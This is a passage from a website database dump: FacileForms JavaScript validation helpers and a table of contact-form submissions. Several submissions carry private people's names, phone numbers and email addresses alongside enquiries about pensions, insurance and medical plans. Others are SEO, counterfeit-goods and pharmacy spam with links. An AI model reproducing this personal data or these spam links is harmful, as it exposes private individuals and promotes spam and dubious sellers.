green in single or multi mode, unselect all other options\r\nff_setSelected(\'mylist\', \'red,green\'); // select red and green in multi mode, unselect all other options','Untyped','function ff_setSelected(name, list)\r\n{\r\n ids = list.split(\',\')\r\n opts = ff_getElementByName(name).options;\r\n for (o = 0; o < opts.length; o++) {\r\n state = false;\r\n for (i = 0; i < ids.length; i++) \r\n if (ids[i]==opts[o].value) {\r\n state = true;\r\n break;\r\n } // if\r\n opts[o].selected = state;\r\n } // for\r\n} // ff_setSelected'),(29,1,'FF','ff_showaction','Show action','Displays the element action.','Element Action','function ff_showaction(element, action)\r\n{\r\n alert(\'Action \'+action+\' performed by element \'+element.id);\r\n}'),(30,1,'FF','ff_showelementinit','Show element initialization','Display the element initialization (mainly for debugging)','Element Init','function ff_showelementinit(element,condition)\r\n{\r\n if(!element.name)\r\n if(element.length && element.length != 0)\r\n alert(\'Initialization of \'+element[0].name+\' at \'+condition);\r\n else\r\n alert(\'Initialization of \'+element.name+\' at \'+condition);\r\n}'),(31,1,'FF','ff_showforminit','Show form initialization','Show when form initialization is run (for debugging)','Form Init','function ff_showforminit()\r\n{\r\n alert(\'Form initialization\');\r\n}'),(32,1,'FF','ff_showsubmitted','Show submitted status','Display submit status as user feedback.','Form Submitted','function ff_showsubmitted(status, message)\r\n{\r\n alert(message);\r\n} // ff_showsubmitted'),(33,1,'FF','ff_showvalidation','Show element validation','Display element validation (for debugging)','Element Validation','function ff_showvalidation(element, message)\r\n{\r\n alert(\'Validation of \'+element.name+\" with message: \\n\"+message);\r\n return \'\';\r\n}'),(34,1,'FF','ff_submittedhome','Return to homepage','Display submit status and then return to the home page of the site.','Form Submitted','function ff_submittedhome(status, message)\r\n{\r\n alert(message+\"\\nYou will be redirected to the home page now.\");\r\n ff_returnHome();\r\n} // ff_submittedhome'),(35,1,'FF','ff_unchecked','Unchecked','Validate that radio button or checkbox is unchecked.','Element Validation','function ff_unchecked(element, message)\r\n{\r\n if (!element.checked) \r\n return \'\'; \r\n else {\r\n if (message==\'\') message = element.name+\" is checked.\\n\";\r\n ff_validationFocus(element.name);\r\n return message;\r\n } // if\r\n} // ff_unchecked'),(36,1,'FF','ff_validate_date_DDMMYYYY','Validate Date DD/MM/YYYY format','Validates that the date in a textfield is correctly formatted in DD/MM/YYYY format.\r\nCan be used with a textfield element and/or the Calendar element.','Element Validation','function ff_validate_date_DDMMYYYY(element, message)\r\n{\r\n // Regular expression used to check if date is in correct format\r\n var pattern = /[0-3][0-9]\\/(0|1)[0-9]\\/(19|20)[0-9]{2}/;\r\n if(pattern.test(element.value))\r\n {\r\n var date_array = element.value.split(\'/\');\r\n var day = date_array[0];\r\n\r\n // Attention! Javascript consider months in the range 0 - 11\r\n var month = date_array[1] - 1;\r\n var year = date_array[2];\r\n\r\n // This instruction will create a date object\r\n source_date = new Date(year,month,day);\r\n\r\n if(year != source_date.getFullYear())\r\n {\r\n return message == \'\' ? \'Element \' + element.name + \' failed my test\' : message;\r\n }\r\n\r\n if(month != source_date.getMonth())\r\n {\r\n return message == \'\' ? \'Element \' + element.name + \' failed my test\' : message;\r\n }\r\n\r\n if(day != source_date.getDate())\r\n {\r\n return message == \'\' ? \'Element \' + element.name + \' failed my test\' : message;\r\n }\r\n }\r\n else\r\n {\r\n return message == \'\' ? \'Element \' + element.name + \' failed my test\' : message;\r\n }\r\n\r\n return \'\';\r\n}'),(37,1,'FF','ff_validate_form','Validate form','Validates the form and displays the result.','Element Action','function ff_validate_form(element, action)\r\n{\r\n if(typeof bfUseErrorAlerts != \'undefined\'){\r\n JQuery(\".bfErrorMessage\").html(\'\');\r\n JQuery(\".bfErrorMessage\").css(\"display\",\"none\");\r\n }\r\n error = ff_validation(0);\r\n if (error != \'\') {\r\n if(typeof bfUseErrorAlerts == \'undefined\'){\r\n alert(error);\r\n } else {\r\n bfShowErrors(error);\r\n }\r\n ff_validationFocus(\'\');\r\n } else\r\n alert(\'All inputs are valid.\');\r\n} // ff_validate_form'),(38,1,'FF','ff_validate_nextpage','Validate and next page','Validates the current page, and if everything is ok is switches to the next page.','Element Action','function ff_validate_nextpage(element, action)\r\n{\r\n if(typeof bfUseErrorAlerts != \'undefined\'){\r\n JQuery(\".bfErrorMessage\").html(\'\');\r\n JQuery(\".bfErrorMessage\").css(\"display\",\"none\");\r\n }\r\n\r\n error = ff_validation(ff_currentpage);\r\n if (error != \'\') {\r\n if(typeof bfUseErrorAlerts == \'undefined\'){\r\n alert(error);\r\n } else {\r\n bfShowErrors(error);\r\n }\r\n ff_validationFocus(\'\');\r\n } else {\r\n ff_switchpage(ff_currentpage+1);\r\n self.scrollTo(0,0); \r\n }\r\n} // ff_validate_nextpage'),(39,1,'FF','ff_validate_page','Validate page','Validates the current page and displays the result.','Element Action','function ff_validate_page(element, action)\r\n{\r\n if(typeof bfUseErrorAlerts != \'undefined\'){\r\n JQuery(\".bfErrorMessage\").html(\'\');\r\n JQuery(\".bfErrorMessage\").css(\"display\",\"none\");\r\n }\r\n error = ff_validation(ff_currentpage);\r\n if (error != \'\') {\r\n if(typeof bfUseErrorAlerts == \'undefined\'){\r\n alert(error);\r\n } else {\r\n bfShowErrors(error);\r\n }\r\n ff_validationFocus(\'\');\r\n } else\r\n alert(\'All inputs are valid.\');\r\n} // ff_validate_page'),(40,1,'FF','ff_validate_prevpage','Validate previous page','Validates the current page and switches to the previous page if all is ok','Element Action','function ff_validate_prevpage(element, action)\r\n{\r\n if(typeof bfUseErrorAlerts != \'undefined\'){\r\n JQuery(\".bfErrorMessage\").html(\'\');\r\n JQuery(\".bfErrorMessage\").css(\"display\",\"none\");\r\n }\r\n\r\n error = ff_validation(ff_currentpage);\r\n if (error != \'\') {\r\n if(typeof bfUseErrorAlerts == \'undefined\'){\r\n alert(error);\r\n } else {\r\n bfShowErrors(error);\r\n }\r\n ff_validationFocus(\'\');\r\n } else{\r\n if(ff_currentpage > 1){\r\n ff_switchpage(ff_currentpage-1);\r\n self.scrollTo(0,0);\r\n }\r\n }\r\n} // ff_validate_prevpage'),(41,1,'FF','ff_validate_submit','Validate and submit form','Validates the whole form, and if everything is ok it submits the form.','Element Action','function ff_validate_submit(element, action)\r\n{\r\n if(typeof bfUseErrorAlerts != \'undefined\'){\r\n JQuery(\".bfErrorMessage\").html(\'\');\r\n JQuery(\".bfErrorMessage\").css(\"display\",\"none\");\r\n }\r\n error = ff_validation(0);\r\n if (error != \'\') {\r\n\r\n if(typeof bfUseErrorAlerts == \'undefined\'){\r\n alert(error);\r\n } else {\r\n bfShowErrors(error);\r\n }\r\n ff_validationFocus();\r\n } else\r\n ff_submitForm();\r\n} // ff_validate_submit'),(42,1,'FF','ff_validemail','Valid email','Validate entry of a valid email (syntax check only)','Element Validation','function ff_validemail(element, message)\r\n{\r\n var check =\r\n /^([a-zA-Z0-9_\\.\\-])+\\@(([a-zA-Z0-9\\-])+\\.)+([a-zA-Z0-9]{2,4})+$/;\r\n if (!check.test(element.value)){\r\n if (message==\'\') message = element.name+\" is no valid email address.\\n\";\r\n ff_validationFocus(element.name);\r\n return message;\r\n } // if\r\n return \'\';\r\n} // ff_validemail'),(43,1,'FF','ff_validemail_repeat','Validate Email repeat','Checks if the field value is a valid email address and has a second counterpart that has an equal value.\r\nThe 2nd email field must be named \"FIELDNAME_repeat\"!','Element Validation','function ff_validemail_repeat(element, message)\r\n{\r\n var check =\r\n /^([a-zA-Z0-9_\\.\\-])+\\@(([a-zA-Z0-9\\-])+\\.)+([a-zA-Z0-9]{2,4})+$/;\r\n if (!check.test(element.value)){\r\n if (message==\'\') message = element.name+\" is no valid email address.\\n\";\r\n ff_validationFocus(element.name);\r\n return message;\r\n } // if\r\n \r\n try{\r\n var repeat = element.name.split(\"ff_nm_\")[1].split(\"[]\")[0];\r\n \r\n if(!ff_getElementByName(repeat + \'_repeat\')){\r\n if (message==\'\') message = repeat+\" has no repeat email field.\\n\";\r\n ff_validationFocus(element.name);\r\n return message;\r\n } else {\r\n if(ff_getElementByName(repeat + \'_repeat\').value != element.value){\r\n if (message==\'\') message = element.name+\" and \" + repeat + \"_repeat do not match.\\n\";\r\n ff_validationFocus(repeat + \'_repeat\');\r\n return message;\r\n }\r\n }\r\n }catch(e){\r\n return e.description;\r\n }\r\n\r\n return \'\';\r\n} // ff_validemail'),(44,1,'FF','ff_valuenotempty','Value not empty','Validate that value is not empty.','Element Validation','function ff_valuenotempty(element, message)\r\n{\r\n if (element.value!=\'\') return \'\'; \r\n if (message==\'\') message = \"Please enter \"+element.name+\".\\n\";\r\n ff_validationFocus(element.name);\r\n return message;\r\n} // ff_valuenotempty');
/*!40000 ALTER TABLE `vzx9b_facileforms_scripts` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_facileforms_subrecords`
--
DROP TABLE IF EXISTS `vzx9b_facileforms_subrecords`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_facileforms_subrecords` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`record` int(11) NOT NULL DEFAULT 0,
`element` int(11) NOT NULL DEFAULT 0,
`title` varchar(255) NOT NULL DEFAULT '',
`name` varchar(255) NOT NULL DEFAULT '',
`type` varchar(255) NOT NULL DEFAULT '',
`value` text DEFAULT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=342 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_facileforms_subrecords`
--
LOCK TABLES `vzx9b_facileforms_subrecords` WRITE;
/*!40000 ALTER TABLE `vzx9b_facileforms_subrecords` DISABLE KEYS */;
INSERT INTO `vzx9b_facileforms_subrecords` VALUES (1,1,5,'Name','NAME','Text','Bevan'),(2,1,28,'Email','EMAIL','Text','bevan@crashtackle.co.za'),(3,1,6,'Department','DEPARTMENT','Select List','bevan@webspring.co.za'),(4,1,33,'Message','MESSAGE','Textarea','Testing'),(5,2,5,'Name','NAME','Text','Bevan'),(6,2,28,'Email','EMAIL','Text','bevan@webspring.co.za'),(7,2,6,'Department','DEPARTMENT','Select List','bevan@webspring.co.za'),(8,2,33,'Message','MESSAGE','Textarea','Testing'),(9,3,5,'Name','NAME','Text','Bevan'),(10,3,28,'Email','EMAIL','Text','bevan@webspring.co.za'),(11,3,6,'Department','DEPARTMENT','Select List','bevan@webspring.co.za'),(12,3,33,'Message','MESSAGE','Textarea','nuther test'),(13,4,58,'Name','NAME','Text','Bevan'),(14,4,59,'Contact Number','CONTACTNUMBER','Text','031 208'),(15,4,64,'Email','EMAIL','Text','bevan@crashtackle.co.za'),(16,4,74,'Department','DEPARTMENT','Select List','General'),(17,4,69,'Comment','COMMENT','Textarea','Testing'),(18,5,58,'Name','NAME','Text','Bevan'),(19,5,59,'Contact Number','CONTACTNUMBER','Text','031 208'),(20,5,64,'Email','EMAIL','Text','bevan@crashtackle.co.za'),(21,5,74,'Department','DEPARTMENT','Select List','Appointments'),(22,5,69,'Comment','COMMENT','Textarea','test'),(23,6,58,'Name','NAME','Text','Bevan'),(24,6,59,'Contact Number','CONTACTNUMBER','Text','031 208'),(25,6,64,'Email','EMAIL','Text','bevan@crashtackle.co.za'),(26,6,74,'Department','DEPARTMENT','Select List','Short Term Insurance'),(27,6,69,'Comment','COMMENT','Textarea','test 2'),(28,7,58,'Name','NAME','Text','Bevan'),(29,7,59,'Contact Number','CONTACTNUMBER','Text','031 208'),(30,7,64,'Email','EMAIL','Text','bevan@webspring.co.za'),(31,7,74,'Department','DEPARTMENT','Select List','Appointments'),(32,7,69,'Comment','COMMENT','Textarea','TEST3'),(33,8,58,'Name','NAME','Text','Bevan'),(34,8,59,'Contact Number','CONTACTNUMBER','Text','078'),(35,8,64,'Email','EMAIL','Text','bevan@crashtackle.co.za'),(36,8,74,'Department','DEPARTMENT','Select List','Short Term Insurance'),(37,8,69,'Comment','COMMENT','Textarea','TESTING'),(38,9,58,'Name','NAME','Text','Bevan'),(39,9,59,'Contact Number','CONTACTNUMBER','Text','0784518062'),(40,9,64,'Email','EMAIL','Text','bevan@webspring.co.za'),(41,9,74,'Department','DEPARTMENT','Select List','Appointments'),(42,9,69,'Comment','COMMENT','Textarea','TESTING LET ME KNOW IF YOU GET THIS!'),(43,10,58,'Name','NAME','Text','Patrick Kabelo Mooketsi'),(44,10,59,'Contact Number','CONTACTNUMBER','Text','0633454439'),(45,10,64,'Email','EMAIL','Text','pmooketsi@nttvw.co.za'),(46,10,74,'Department','DEPARTMENT','Select List','General'),(47,10,69,'Comment','COMMENT','Textarea','I would like to apply for my pensions and provident fund claim as I\'m no longer employed by NTT Volkswagen Potchefstroom'),(48,11,58,'Name','NAME','Text','Ivana Berts'),(49,11,59,'Contact Number','CONTACTNUMBER','Text','2063095272'),(50,11,64,'Email','EMAIL','Text','ivana.brets@gmail.com'),(51,11,74,'Department','DEPARTMENT','Select List','General'),(52,11,69,'Comment','COMMENT','Textarea','Hi\r\nWe can help your website to get on first page of Google and increase the number of leads and sales you are getting from your website. Please email us back for full proposal.\r\n\r\nBest Regards\r\nIvana'),(53,12,58,'Name','NAME','Text','Ирина Викторовна'),(54,12,59,'Contact Number','CONTACTNUMBER','Text','------'),(55,12,64,'Email','EMAIL','Text','anacron@mail.ru'),(56,12,74,'Department','DEPARTMENT','Select List','Short Term Insurance'),(57,12,69,'Comment','COMMENT','Textarea','Здравствуйте, предлагаем Вам услуги комплексного продвижения вашего сайта, подробнее с нашими услугами Вы можете ознакомиться по ссылке http://www.anacron.ru/ Извините за беспокойство.'),(58,13,58,'Name','NAME','Text','Martin Barnard '),(59,13,59,'Contact Number','CONTACTNUMBER','Text','0829577007 '),(60,13,64,'Email','EMAIL','Text','martin.caledon@gmail.com'),(61,13,74,'Department','DEPARTMENT','Select List','Healthcare'),(62,13,69,'Comment','COMMENT','Textarea','Shirley or Prabash,\r\n\r\nPlease can you give me a call on 0829577007 '),(63,14,58,'Name','NAME','Text','Isabel Stevens'),(64,14,59,'Contact Number','CONTACTNUMBER','Text','083 458 3919'),(65,14,64,'Email','EMAIL','Text','bushelectric@telkomsa.net'),(66,14,74,'Department','DEPARTMENT','Select List','Appointments'),(67,14,69,'Comment','COMMENT','Textarea','I need to discuss our Discovery plans and need advice. we are in Paarl\r\n'),(68,15,58,'Name','NAME','Text','Tom'),(69,15,64,'Email','EMAIL','Text','tbriggs@autolikes.com'),(70,16,58,'Name','NAME','Text','ivana brets'),(71,16,59,'Contact Number','CONTACTNUMBER','Text','206-309-5272'),(72,16,64,'Email','EMAIL','Text','ivana.brets02@gmail.com'),(73,16,74,'Department','DEPARTMENT','Select List','General'),(74,16,69,'Comment','COMMENT','Textarea','Hi\r\nWe can help your website to get on first page of Google and increase the number of leads and sales you are getting from your website. Please email us back for full proposal.\r\n\r\nBest Regards\r\nIvana'),(75,17,58,'Name','NAME','Text','Richard Miller'),(76,17,64,'Email','EMAIL','Text','richardmiller2021@gmail.com'),(77,17,74,'Department','DEPARTMENT','Select List','Financial Planning'),(78,17,69,'Comment','COMMENT','Textarea','Hello \r\n \r\nHope you are doing great. \r\n \r\nI recently came across smithandsmith.co.za and found it very interesting but your on-page SEO could be better. \r\n \r\nI want to show you a new wordPress plugin which has all the features to do your on-page SEO with ease. \r\n \r\nSEO is becoming so complicated now that it’s no longer possible to do it without an expert’s help.Even if you know your SEO, it would still take up too much of your time and keep you away from doing what you really want to do. \r\n \r\nThis WordPress plugin makes SEO so easy and quick that anybody could do it. \r\n \r\n1) Provides instant feedback and suggestions to improve your content. Warns and prevent you from over optimizing your content. \r\n \r\n2) Alerts you on precisely on what’s hurting your website so you can fix them instantly. \r\n \r\n3) Control how the Internet understands your website. Improve search relevancy without having to mess with a single line of code. \r\n \r\n4) Complete governance over how search engine crawlers navigate your website. Steer them the way you like for better indexation control. \r\n \r\n5) Build and manage your perfect internal link structure effortlessly. \r\n \r\nIf you\'re an online marketer, you would know that these features are all going to be very useful to you. And that\'s why we have spent thousands of hours researching and studying the needs of a modern online marketer. And the result, they\'ve successfully designed a plugin that caters to all the needs of a marketer. \r\n \r\nKindly revert back if you are interested. I would be happy to send you the details. \r\n \r\nI look forward to hearing from you soon! \r\n \r\nThanks & Regards, \r\n \r\n \r\n \r\n \r\nNote: - If this is something you are interested, please respond to this email. If this is not your interest, don\'t worry, we will not email you again.'),(79,18,58,'Name','NAME','Text','ivana brets'),(80,18,59,'Contact Number','CONTACTNUMBER','Text','206-309-5272'),(81,18,64,'Email','EMAIL','Text','ivana.brets02@gmail.com'),(82,18,74,'Department','DEPARTMENT','Select List','General'),(83,18,69,'Comment','COMMENT','Textarea','\r\nHi\r\nWe can help your website to get on first page of Google and increase the number of leads and sales you are getting from your website. Please email us back for full proposal.\r\n\r\nBest Regards\r\nIvana'),(84,19,58,'Name','NAME','Text','Brian Norie'),(85,19,59,'Contact Number','CONTACTNUMBER','Text','0823270807'),(86,19,64,'Email','EMAIL','Text','brian@tmsgroup.co.za'),(87,19,74,'Department','DEPARTMENT','Select List','Financial Planning'),(88,19,69,'Comment','COMMENT','Textarea','Can Ferdi please contact me regarding my provident fund\r\nRegards\r\nBrian\r\nTrollope Mining Services'),(89,20,58,'Name','NAME','Text','Robertelics'),(90,20,59,'Contact Number','CONTACTNUMBER','Text','85863686511'),(91,20,64,'Email','EMAIL','Text','inbox199@glmux.com'),(92,20,74,'Department','DEPARTMENT','Select List','General'),(93,20,69,'Comment','COMMENT','Textarea','Thanks for your wonderful blog. It was actually very useful. I am so happy I discovered this. \r\nhttp://fourbloodmoons.net/2016/11/12/personalized-papers-composing-company-2/\r\n'),(94,21,58,'Name','NAME','Text','AnthonyOxymn'),(95,21,59,'Contact Number','CONTACTNUMBER','Text','84774257757'),(96,21,64,'Email','EMAIL','Text','eshk33253@first.baburn.com'),(97,21,74,'Department','DEPARTMENT','Select List','General'),(98,21,69,'Comment','COMMENT','Textarea','ngebqcz \r\n \r\nhttp://www.raybansaleuk.ru/ray-ban-vintage-wayfarer-227.htm\r\nhttp://www.kirchgemeinde-klix.de/fendi-tasche-gebraucht-819.htm\r\nhttp://www.raybansaleuk.ru/ray-ban-youngster-rubber-aviator-421.htm\r\nhttp://www.unit4motors.co.uk/nike-sportswear-windrunner-pants-444.html\r\nhttp://www.rent-a-ghost.co.uk/088-nike-mens-air-max-uptempo-fuse-360-basketball-shoes.htm\r\n \r\n<a href=http://www.esrin.it/orologi-rolex-doro-746.php>Orologi Rolex D\'oro</a>\r\n<a href=http://www.the-seasons.co.uk/481-balenciaga-toolkit-bag.htm>Balenciaga Toolkit Bag</a>\r\n<a href=http://www.stox.dk/taske-balenciaga-557.php>Taske Balenciaga]</a>\r\n<a href=http://www.dc-fournituren-hobby.nl/rolex-goud-672.asp>Rolex Goud</a>\r\n<a href=http://www.hvpalacios.es/812-gucci-bag-for-man.html>Gucci Bag For Man</a>\r\n'),(99,22,58,'Name','NAME','Text','KellyemaDa'),(100,22,59,'Contact Number','CONTACTNUMBER','Text','89424655591'),(101,22,64,'Email','EMAIL','Text','gdgj65567@first.baburn.com'),(102,22,74,'Department','DEPARTMENT','Select List','General'),(103,22,69,'Comment','COMMENT','Textarea','gzsbang \r\n \r\nhttp://www.nikeairmax1salenederland.nl/air-max-1-ultra-moire.php\r\nhttp://www.computercornervolendam.nl/gucci-handtassen-replica-746.htm\r\nhttp://www.reproductions-international.co.uk/978-nike-air-max-uptempo-whiteblack-teal.shtml\r\nhttp://www.stox.dk/prada-solbriller-dame-519.php\r\nhttp://www.sobike.fr/omega-deville-tresor-536.html\r\n \r\n<a href=http://www.b-boys.dk/213-rolex-ure-pĂĄ-auktion.html>Rolex Ure PĂĄ Auktion]</a>\r\n<a href=http://www.the-seasons.co.uk/709-balenciaga-day-bag-men.htm>Balenciaga Day Bag Men</a>\r\n<a href=http://www.alan-ayers.co.uk/fendi-hobo-spy-986.html>Fendi Hobo Spy</a>\r\n<a href=http://www.evolutionarygenomics.dk/prada-solbriller-sport-116.html>Prada Solbriller Sport]</a>\r\n<a href=http://www.needmoresales.co.uk/839-nike-jacket-no-hood.php>Nike Jacket No Hood]</a>\r\n'),(104,23,58,'Name','NAME','Text','Thomasgrask'),(105,23,59,'Contact Number','CONTACTNUMBER','Text','87874346527'),(106,23,64,'Email','EMAIL','Text','gehq11165@catch@first.baburn.com'),(107,23,74,'Department','DEPARTMENT','Select List','General'),(108,23,69,'Comment','COMMENT','Textarea','eviaynw \r\n \r\nhttp://www.unit4motors.co.uk/nike-men-hoodie-984.html\r\nhttp://www.raybansaleuk.ru/ray-ban-wayfarer-purple-and-black-794.htm\r\nhttp://www.delordsmerchandise.co.uk/827-burberry-iphone-7-plus-wallet-case.htm\r\nhttp://www.electronicwaves.co.uk/nike-jogger-pants-for-men-084.html\r\nhttp://www.carnevalearadeino.it/gucci-borsette-599.html\r\n \r\n<a href=http://www.hall-architekten.de/burberry-handytasche-iphone-6-plus-669.htm>Burberry Handytasche Iphone 6 Plus</a>\r\n<a href=http://www.liart.it/gucci-borse-primavera-estate-2017-488.htm>Gucci Borse Primavera Estate 2017</a>\r\n<a href=http://www.20thcenturyfrox.co.uk/omega-speedmaster-apollo-11-392.html>Omega Speedmaster Apollo 11</a>\r\n<a href=http://www.unit4motors.co.uk/nike-womens-trousers-956.html>Nike Womens Trousers]</a>\r\n<a href=http://www.electronicwaves.co.uk/nike-short-pants-308.html>Nike Short Pants]</a>\r\n'),(109,24,58,'Name','NAME','Text','WilbertBah'),(110,24,59,'Contact Number','CONTACTNUMBER','Text','83812156119'),(111,24,64,'Email','EMAIL','Text','sosu94308@first.baburn.com'),(112,24,74,'Department','DEPARTMENT','Select List','General'),(113,24,69,'Comment','COMMENT','Textarea','hfgdffi \r\n \r\nhttp://www.accelerated-learning-uk.co.uk/black-adidas-hoodie-gold-357.htm\r\nhttp://www.syndicatinitiativecologne32.fr/gucci-soho-shoulder-bag-price-malaysia-147.html\r\nhttp://www.gymnasium-wittenburg.de/346-hermes-handtaschen-replica.html\r\nhttp://www.crazylarrys.co.uk/gucci-belt-vintage-432.php\r\nhttp://www.likr.es/guess-belt-mens-391.html\r\n \r\n<a href=http://www.cahro.co.uk/fendi-bag-new-417.cfm>Fendi Bag New</a>\r\n<a href=http://www.hall-architekten.de/samsung-galaxy-s4-hĂĽlle-burberry-086.htm>Samsung Galaxy S4 HĂĽlle Burberry</a>\r\n<a href=http://www.kirchgemeinde-klix.de/fendi-iphone-hĂĽlle-765.htm>Fendi Iphone HĂĽlle</a>\r\n<a href=http://www.bzone.se/234-omega-klockor-pĂĄ-nätet.php>Omega Klockor PĂĄ Nätet]</a>\r\n<a href=http://www.dunmowrunners.co.uk/818-hermes-garden-party-30-review.htm>Hermes Garden Party 30 Review</a>\r\n'),(114,25,58,'Name','NAME','Text','Bevan'),(115,25,59,'Contact Number','CONTACTNUMBER','Text','031'),(116,25,64,'Email','EMAIL','Text','bevan@crashtackle.co.za'),(117,25,74,'Department','DEPARTMENT','Select List','Short Term Insurance'),(118,25,69,'Comment','COMMENT','Textarea','TEST'),(119,26,58,'Name','NAME','Text','Henryacast'),(120,26,59,'Contact Number','CONTACTNUMBER','Text','88982213895'),(121,26,64,'Email','EMAIL','Text','vakp81574@first.baburn.com'),(122,26,74,'Department','DEPARTMENT','Select List','General'),(123,26,69,'Comment','COMMENT','Textarea','jsodnrn \r\n \r\nhttp://www.learn-a-lot.co.uk/632-rolex-watch-men.htm\r\nhttp://www.taxihkb.nl/976-zonnebrillen-guess.htm\r\nhttp://www.swolthuis.nl/086-gucci-zonnebril-zwart.htm\r\nhttp://www.bcf-menuiserie.fr/sacs-Ă€-main-hermes-birkin-527.html\r\nhttp://www.cahro.co.uk/fendi-monster-bag-clutch-766.cfm\r\n \r\n<a href=http://www.oakleygogglesuk.ru/oakley-shades-for-women-2016-704.html>Oakley Shades For Women 2016</a>\r\n<a href=http://www.evolutionarygenomics.dk/kamryn-guess-tote-885.html>Kamryn Guess Tote]</a>\r\n<a href=http://www.oblatidimariavergine.it/occhiali-da-vista-miu-miu-216.html>Occhiali Da Vista Miu Miu</a>\r\n<a href=http://www.piranhas-oberhausen.de/561-rolex-yachtmaster-blau.php>Rolex Yachtmaster Blau</a>\r\n<a href=http://www.unit4motors.co.uk/nike-jackets-long-423.html>Nike Jackets Long]</a>\r\n'),(124,27,58,'Name','NAME','Text','AndrewLog'),(125,27,59,'Contact Number','CONTACTNUMBER','Text','84821133143'),(126,27,64,'Email','EMAIL','Text','jshv82911@catch@first.baburn.com'),(127,27,74,'Department','DEPARTMENT','Select List','General'),(128,27,69,'Comment','COMMENT','Textarea','uvaexzs \r\n \r\nhttp://www.tobob.co.uk/miu-miu-wink-sunglasses-013.htm\r\nhttp://www.witteduiven-kledingverhuur.nl/omega-constellation-prijs-heren-868.html\r\nhttp://www.seatfreundeworms.de/rolex-gold-männer-788.html\r\nhttp://www.rootswork.de/294-prada-double-bag-schwarz.php\r\nhttp://www.pizzeria-stmaria.fr/473-hermes-birkin-30cm-etoupe-togo.htm\r\n \r\n<a href=http://www.electronicwaves.co.uk/nike-sweatshirt-bayan-055.html>Nike Sweatshirt Bayan]</a>\r\n<a href=http://www.propertyquarters.co.uk/220-omega-seamaster-aqua-terra-black-dial.cfm>Omega Seamaster Aqua Terra Black Dial</a>\r\n<a href=http://www.parajumperswinterjassale.nl/092-parajumper-kinderjassen.html>Parajumper Kinderjassen</a>\r\n<a href=http://www.mcpmotorsport.co.uk/hermes-birkin-horse-embossed-528.asp>Hermes Birkin Horse Embossed</a>\r\n<a href=http://www.shellpluspoints.co.uk/fendi-bag-with-studs-281.php>Fendi Bag With Studs</a>\r\n'),(129,28,58,'Name','NAME','Text','Bevan'),(130,28,59,'Contact Number','CONTACTNUMBER','Text','031'),(131,28,64,'Email','EMAIL','Text','bevan@crashtackle.co.za'),(132,28,74,'Department','DEPARTMENT','Select List','General'),(133,28,69,'Comment','COMMENT','Textarea','TESTING SPAM PROTECTION'),(134,29,58,'Name','NAME','Text','AIllurlScourse'),(135,29,59,'Contact Number','CONTACTNUMBER','Text','87544466558'),(136,29,64,'Email','EMAIL','Text','setheithei@bestmailonline.com'),(137,29,74,'Department','DEPARTMENT','Select List','General'),(138,29,69,'Comment','COMMENT','Textarea',' Torsion bras de quelqu\'un est comment poupe votre sang pousse contre les parois de vos arteres lorsque votre coeur determination pompe le sang. Arteres sont les tubes qui transportent perseverent b gerer offre sang loin de votre coeur. Chaque culture votre moelle bat, il pompe le sang a tous egards vos arteres a la prendre facilement de votre corps. \r\nhttps://www.cialispascherfr24.com/cialis-naturel-pour-homme-noir/ '),(139,30,58,'Name','NAME','Text','ZamesSnony'),(140,30,59,'Contact Number','CONTACTNUMBER','Text','82357785364'),(141,30,64,'Email','EMAIL','Text','bancolur@yandex.com'),(142,30,74,'Department','DEPARTMENT','Select List','General'),(143,30,69,'Comment','COMMENT','Textarea','buy viagra safley\r\n http://glviagragtr.com - generic viagra\r\n cailis\r\n <a href=\"http://glviagragtr.com\">viagra pills\r\n</a> - viagra vs viagra prices messageboard.html\r\n viagra 20mg side effects posts\r\n'),(144,31,58,'Name','NAME','Text','Zouisvog'),(145,31,59,'Contact Number','CONTACTNUMBER','Text','86275569812'),(146,31,64,'Email','EMAIL','Text','donzetil@yandex.com'),(147,31,74,'Department','DEPARTMENT','Select List','General'),(148,31,69,'Comment','COMMENT','Textarea','viagra knowledge base\r\n http://xlviagragtr.com - generic viagra\r\n recomended pharmacy sites for viagra\r\n <a href=\"http://xlviagragtr.com\">generic viagra\r\n</a> - viagra and alcohol consumption website\r\n viagra 20 mg 4 tablet users browsing this forum\r\n'),(149,32,58,'Name','NAME','Text','Lloyzaquak'),(150,32,59,'Contact Number','CONTACTNUMBER','Text','85991368869'),(151,32,64,'Email','EMAIL','Text','kivnamex@yandex.com'),(152,32,74,'Department','DEPARTMENT','Select List','General'),(153,32,69,'Comment','COMMENT','Textarea','levitra trial\r\n http://levitragtr.com - levitra 20 mg\r\n levitra overnight pharmacy levitralevitra generic name any\r\n <a href=\"http://levitragtr.com\">levitra 20 mg\r\n</a> - safe pharmacy sites for levitra\r\n average price of levitra\r\n'),(154,33,58,'Name','NAME','Text','Russ Turner'),(155,33,59,'Contact Number','CONTACTNUMBER','Text','989-123-1226'),(156,33,64,'Email','EMAIL','Text','info@ranks.co.in'),(157,33,74,'Department','DEPARTMENT','Select List','General'),(158,33,69,'Comment','COMMENT','Textarea','Hi,\r\n \r\nDo you look forward for some out of the box web design? \r\n\r\nWe can help you with our amazing web design service under very economic price. \r\n\r\nGet in touch with us to explore more about our web design services.\r\n\r\nThanks\r\nRuss | Whatsapp: +91 9212464161'),(159,34,58,'Name','NAME','Text','Pieter Joubert'),(160,34,59,'Contact Number','CONTACTNUMBER','Text','0117533397'),(161,34,64,'Email','EMAIL','Text','pjoubert@connix.co.za'),(162,34,74,'Department','DEPARTMENT','Select List','General'),(163,34,69,'Comment','COMMENT','Textarea','Indemnity cover for dentists needed'),(164,35,58,'Name','NAME','Text','Ramesh Agarwal'),(165,35,59,'Contact Number','CONTACTNUMBER','Text','09123628488'),(166,35,64,'Email','EMAIL','Text','sapwebsolutionind@gmail.com'),(167,35,74,'Department','DEPARTMENT','Select List','General'),(168,35,69,'Comment','COMMENT','Textarea','Hi\r\n\r\nI am Ramesh;\r\n \r\nI was on your website. I am a business development manager of a renowned SEO, Web Design & Development Company. We are offering SEO, Web Design, Web Development, PPC, Mail Marketing, Graphics Design and complete Link Building Services from last 7 years.\r\n\r\nWe will be happy to help execute SEO & Web Design and Development projects at a much lower cost than what you have in house. No compromise on quality!\r\n\r\nWe have just gone through your website and found some issues, that are as follows - 